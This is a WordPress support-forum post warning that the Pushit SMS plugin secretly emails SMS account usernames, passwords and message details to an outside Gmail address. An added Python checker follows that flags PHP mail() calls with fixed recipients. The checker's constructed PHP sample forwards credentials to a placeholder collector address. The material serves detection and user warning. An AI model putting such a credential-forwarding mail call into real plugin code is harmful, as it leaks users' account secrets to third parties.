Title: Pushit plug-in using malicious code?
Last modified: August 19, 2016

---

# Pushit plug-in using malicious code?

 *  [dtjb](https://wordpress.org/support/users/dtjb/)
 * (@dtjb)
 * [16 years, 10 months ago](https://wordpress.org/support/topic/pushit-plug-in-using-malicious-code/)
 * Before installing this plugin, read [this](http://mentalfruition.com/2009/07/08/are-your-wordpress-plugins-safe/).
 * > This part of the plugin sends an SMS via the given SMS gateway. As usual for
   > these types of services, you have to send the username and password of your
   > account with the SMS service in the URL call to the web service.
   > Yet towards the end of this send function, there’s a call to PHP’s mail function.
   > It sends the following to smart.maxx@gmail.com:
   >  * receiving number
   >  * message sent
   >  * username of SMS service account
   >  * password of SMS service account
   >  * the short number used
   >  * the sender name/number to be displayed on the receiving mobile
   >  * whether the SMS was sent OK
   > Apparently the authors of this plugin deem that this information is something
   > that someone with the e-mail address smart.maxx@gmail.com
   > should have about every SMS you, or your visitors, attempt to send using their
   > plugin.
 * [http://wordpress.org/extend/plugins/pushit/](http://wordpress.org/extend/plugins/pushit/)
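
For anyone reviewing a plugin for the pattern the quoted write-up describes (a `mail()` call with a fixed recipient inside the send routine), here is an added example, not part of the original post and not the plugin's code. It is a small static check that flags `mail()` and `wp_mail()` calls whose recipient is a literal address or a variable assigned one; the PHP sample, function name and addresses are constructed placeholders.

```python
import re

# Constructed PHP sample (not the plugin's code); names and addresses are placeholders.
SAMPLE_PHP = """<?php
function example_send_sms($to, $msg, $user, $pass) {
    $url = "https://sms.example.invalid/send?u=$user&p=$pass&to=$to";
    $ok = file_get_contents($url);
    $dest = 'collector@example.invalid';
    mail($dest, 'log', "$to $msg $user $pass $ok");
    wp_mail(get_option('admin_email'), 'SMS sent', $msg);
    mail("audit@example.invalid", 'log', $msg);
}
"""

# mail( or wp_mail( as a plain function call (not ->mail, ::mail, $mail or foo_mail);
# group 1 is the first argument up to the first comma (heuristic, not a PHP parser).
MAIL_CALL = re.compile(r'(?<![\w>:$])(?:wp_)?mail\s*\(\s*([^,]+),', re.IGNORECASE)
EMAIL = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
# $var = 'literal'; assignments, used to resolve a recipient passed as a variable.
STRING_ASSIGN = re.compile(r'(\$\w+)\s*=\s*(["\'])(.*?)\2\s*;')


def find_hardcoded_mail_recipients(php_source):
    """Return [(line_number, address)] for mail calls with a fixed recipient."""
    literals = {}
    for m in STRING_ASSIGN.finditer(php_source):
        addr = EMAIL.search(m.group(3))
        if addr:
            literals[m.group(1)] = addr.group(0)

    findings = []
    for m in MAIL_CALL.finditer(php_source):
        arg = m.group(1).strip()
        addr = EMAIL.search(arg)
        recipient = addr.group(0) if addr else literals.get(arg)
        if recipient:
            line = php_source.count("\n", 0, m.start()) + 1
            findings.append((line, recipient))
    return findings


if __name__ == "__main__":
    for line, recipient in find_hardcoded_mail_recipients(SAMPLE_PHP):
        print(f"line {line}: mail sent to fixed address {recipient}")
```

A hit is a prompt to read the surrounding function, not a verdict; recipients built by concatenation or decoded at runtime will not match this heuristic.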

The topic ‘Pushit plug-in using malicious code?’ is closed to new replies.

 * Status: not resolved

